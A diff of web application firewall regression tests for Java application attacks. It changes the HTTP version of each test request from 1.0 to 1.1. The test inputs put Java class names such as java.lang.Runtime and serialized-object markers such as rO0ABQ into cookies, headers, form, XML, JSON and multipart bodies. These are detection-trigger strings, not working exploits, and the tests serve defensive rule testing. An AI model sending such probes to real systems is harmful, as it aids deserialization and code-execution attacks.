@@ -6993,7 +6993,7 @@ tests:
             Cookie: java.lang.Runtime=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7014,7 +7014,7 @@ tests:
             test: java.lang.Runtime
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7034,7 +7034,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Runtime\">element_value</element></xml>"
         output:
           log:
@@ -7054,7 +7054,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.Runtime</element></xml>"
         output:
           log:
@@ -7074,7 +7074,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Runtime</element></l3></l2></l1></xml>"
         output:
           log:
@@ -7094,7 +7094,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.Runtime"
         output:
           log:
@@ -7114,7 +7114,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.Runtime\"}"
         output:
           log:
@@ -7134,7 +7134,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.Runtime\": \"test\"}"
         output:
           log:
@@ -7154,7 +7154,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.String"
         output:
           log:
@@ -7174,7 +7174,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.String=test"
         output:
           log:
@@ -7195,7 +7195,7 @@ tests:
             Cookie: test=java.lang.String
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7216,7 +7216,7 @@ tests:
             Cookie: java.lang.String=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7237,7 +7237,7 @@ tests:
             test: java.lang.String
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7257,7 +7257,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.String\">element_value</element></xml>"
         output:
           log:
@@ -7277,7 +7277,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.String</element></xml>"
         output:
           log:
@@ -7297,7 +7297,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.String</element></l3></l2></l1></xml>"
         output:
           log:
@@ -7317,7 +7317,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.String"
         output:
           log:
@@ -7337,7 +7337,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.String\"}"
         output:
           log:
@@ -7357,7 +7357,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.String\": \"test\"}"
         output:
           log:
@@ -7377,7 +7377,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.StringBuilder"
         output:
           log:
@@ -7397,7 +7397,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.StringBuilder=test"
         output:
           log:
@@ -7418,7 +7418,7 @@ tests:
             Cookie: test=java.lang.StringBuilder
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7439,7 +7439,7 @@ tests:
             Cookie: java.lang.StringBuilder=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7460,7 +7460,7 @@ tests:
             test: java.lang.StringBuilder
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7480,7 +7480,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.StringBuilder\">element_value</element></xml>"
         output:
           log:
@@ -7500,7 +7500,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.StringBuilder</element></xml>"
         output:
           log:
@@ -7520,7 +7520,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.StringBuilder</element></l3></l2></l1></xml>"
         output:
           log:
@@ -7540,7 +7540,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.StringBuilder"
         output:
           log:
@@ -7560,7 +7560,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.StringBuilder\"}"
         output:
           log:
@@ -7580,7 +7580,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.StringBuilder\": \"test\"}"
         output:
           log:
@@ -7600,7 +7600,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.System"
         output:
           log:
@@ -7620,7 +7620,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.lang.System=test"
         output:
           log:
@@ -7641,7 +7641,7 @@ tests:
             Cookie: test=java.lang.System
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7662,7 +7662,7 @@ tests:
             Cookie: java.lang.System=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7683,7 +7683,7 @@ tests:
             test: java.lang.System
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7703,7 +7703,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.System\">element_value</element></xml>"
         output:
           log:
@@ -7723,7 +7723,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.System</element></xml>"
         output:
           log:
@@ -7743,7 +7743,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.System</element></l3></l2></l1></xml>"
         output:
           log:
@@ -7763,7 +7763,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.lang.System"
         output:
           log:
@@ -7783,7 +7783,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.lang.System\"}"
         output:
           log:
@@ -7803,7 +7803,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.lang.System\": \"test\"}"
         output:
           log:
@@ -7823,7 +7823,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=javax.script.ScriptEngineManager"
         output:
           log:
@@ -7843,7 +7843,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "javax.script.ScriptEngineManager=test"
         output:
           log:
@@ -7864,7 +7864,7 @@ tests:
             Cookie: test=javax.script.ScriptEngineManager
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7885,7 +7885,7 @@ tests:
             Cookie: javax.script.ScriptEngineManager=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7906,7 +7906,7 @@ tests:
             test: javax.script.ScriptEngineManager
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -7926,7 +7926,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"javax.script.ScriptEngineManager\">element_value</element></xml>"
         output:
           log:
@@ -7946,7 +7946,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">javax.script.ScriptEngineManager</element></xml>"
         output:
           log:
@@ -7966,7 +7966,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">javax.script.ScriptEngineManager</element></l3></l2></l1></xml>"
         output:
           log:
@@ -7986,7 +7986,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=javax.script.ScriptEngineManager"
         output:
           log:
@@ -8006,7 +8006,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"javax.script.ScriptEngineManager\"}"
         output:
           log:
@@ -8026,7 +8026,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"javax.script.ScriptEngineManager\": \"test\"}"
         output:
           log:
@@ -8046,7 +8046,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=org.apache.commons"
         output:
           log:
@@ -8066,7 +8066,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "org.apache.commons=test"
         output:
           log:
@@ -8087,7 +8087,7 @@ tests:
             Cookie: test=org.apache.commons
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -8108,7 +8108,7 @@ tests:
             Cookie: org.apache.commons=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -8129,7 +8129,7 @@ tests:
             test: org.apache.commons
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -8149,7 +8149,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"org.apache.commons\">element_value</element></xml>"
         output:
           log:
@@ -8169,7 +8169,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">org.apache.commons</element></xml>"
         output:
           log:
@@ -8189,7 +8189,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">org.apache.commons</element></l3></l2></l1></xml>"
         output:
           log:
@@ -8209,7 +8209,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=org.apache.commons"
         output:
           log:
@@ -8229,7 +8229,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"org.apache.commons\"}"
         output:
           log:
@@ -8249,7 +8249,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"org.apache.commons\": \"test\"}"
         output:
           log:
@@ -8269,7 +8269,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=org.omg.CORBA"
         output:
           log:
@@ -8289,7 +8289,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "org.omg.CORBA=test"
         output:
           log:
@@ -8310,7 +8310,7 @@ tests:
             Cookie: test=org.omg.CORBA
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -8331,7 +8331,7 @@ tests:
             Cookie: org.omg.CORBA=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -8352,7 +8352,7 @@ tests:
             test: org.omg.CORBA
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -8372,7 +8372,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"org.omg.CORBA\">element_value</element></xml>"
         output:
           log:
@@ -8392,7 +8392,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">org.omg.CORBA</element></xml>"
         output:
           log:
@@ -8412,7 +8412,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">org.omg.CORBA</element></l3></l2></l1></xml>"
         output:
           log:
@@ -8432,7 +8432,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=org.omg.CORBA"
         output:
           log:
@@ -8452,7 +8452,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"org.omg.CORBA\"}"
         output:
           log:
@@ -8472,7 +8472,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"org.omg.CORBA\": \"test\"}"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
index 8aa888914..8546f4614 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=rO0ABQ"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "rO0ABQ=test"
         output:
           log:
@@ -59,7 +59,7 @@ tests:
             Cookie: test=rO0ABQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -80,7 +80,7 @@ tests:
             Cookie: rO0ABQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -101,7 +101,7 @@ tests:
             test: rO0ABQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -121,7 +121,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><rO0ABQ attribute_name=\"attribute_value\">value</rO0ABQ></xml>"
         output:
           log:
@@ -141,7 +141,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element rO0ABQ=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -161,7 +161,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"rO0ABQ\">element_value</element></xml>"
         output:
           log:
@@ -181,7 +181,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">rO0ABQ</element></xml>"
         output:
           log:
@@ -201,7 +201,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">rO0ABQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -221,7 +221,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=rO0ABQ"
         output:
           log:
@@ -241,7 +241,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"rO0ABQ\"}"
         output:
           log:
@@ -261,7 +261,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"rO0ABQ\": \"test\"}"
         output:
           log:
@@ -281,7 +281,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -307,7 +307,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -333,7 +333,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -359,7 +359,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -385,7 +385,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=KztAAU"
         output:
           log:
@@ -405,7 +405,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "KztAAU=test"
         output:
           log:
@@ -426,7 +426,7 @@ tests:
             Cookie: test=KztAAU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -447,7 +447,7 @@ tests:
             Cookie: KztAAU=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -468,7 +468,7 @@ tests:
             test: KztAAU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -488,7 +488,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><KztAAU attribute_name=\"attribute_value\">value</KztAAU></xml>"
         output:
           log:
@@ -508,7 +508,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element KztAAU=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -528,7 +528,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"KztAAU\">element_value</element></xml>"
         output:
           log:
@@ -548,7 +548,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">KztAAU</element></xml>"
         output:
           log:
@@ -568,7 +568,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">KztAAU</element></l3></l2></l1></xml>"
         output:
           log:
@@ -588,7 +588,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=KztAAU"
         output:
           log:
@@ -608,7 +608,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"KztAAU\"}"
         output:
           log:
@@ -628,7 +628,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"KztAAU\": \"test\"}"
         output:
           log:
@@ -648,7 +648,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -674,7 +674,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -700,7 +700,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -726,7 +726,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -752,7 +752,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Cs7QAF"
         output:
           log:
@@ -772,7 +772,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Cs7QAF=test"
         output:
           log:
@@ -793,7 +793,7 @@ tests:
             Cookie: test=Cs7QAF
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -814,7 +814,7 @@ tests:
             Cookie: Cs7QAF=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -835,7 +835,7 @@ tests:
             test: Cs7QAF
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -855,7 +855,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><Cs7QAF attribute_name=\"attribute_value\">value</Cs7QAF></xml>"
         output:
           log:
@@ -875,7 +875,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element Cs7QAF=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -895,7 +895,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Cs7QAF\">element_value</element></xml>"
         output:
           log:
@@ -915,7 +915,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Cs7QAF</element></xml>"
         output:
           log:
@@ -935,7 +935,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Cs7QAF</element></l3></l2></l1></xml>"
         output:
           log:
@@ -955,7 +955,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Cs7QAF"
         output:
           log:
@@ -975,7 +975,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Cs7QAF\"}"
         output:
           log:
@@ -995,7 +995,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Cs7QAF\": \"test\"}"
         output:
           log:
